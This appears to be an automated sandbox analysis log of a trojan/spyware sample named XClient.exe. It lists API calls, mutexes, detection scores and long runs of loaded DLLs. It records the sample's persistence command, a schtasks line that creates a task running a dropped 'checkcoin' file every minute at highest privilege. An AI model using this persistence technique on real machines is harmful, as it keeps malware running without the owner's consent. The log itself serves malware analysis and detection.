                  Source: checkcoin.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: checkcoin.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: XClient.exe.bin.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: XClient.exe.bin.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/4@1/1
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\checkcoinJump to behavior
                  Source: C:\Users\user\checkcoinMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:348:120:WilError_03
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2780:120:WilError_03
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeMutant created: \Sessions\1\BaseNamedObjects\W0f7YpeDQosHbW9j
                  Source: C:\Windows\System32\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                  Source: XClient.exe.bin.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: XClient.exe.bin.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: XClient.exe.bin.exeVirustotal: Detection: 72%
                  Source: XClient.exe.bin.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeFile read: C:\Users\user\Desktop\XClient.exe.bin.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\XClient.exe.bin.exe "C:\Users\user\Desktop\XClient.exe.bin.exe"
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"
                  Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\checkcoin C:\Users\user\checkcoin
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: unknownProcess created: C:\Windows\System32\OpenWith.exe C:\Windows\system32\OpenWith.exe -Embedding
                  Source: unknownProcess created: C:\Users\user\checkcoin C:\Users\user\checkcoin
                  Source: unknownProcess created: C:\Users\user\checkcoin C:\Users\user\checkcoin
                  Source: unknownProcess created: C:\Users\user\checkcoin C:\Users\user\checkcoin
                  Source: unknownProcess created: C:\Users\user\checkcoin C:\Users\user\checkcoin
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin"Jump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\checkcoinSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
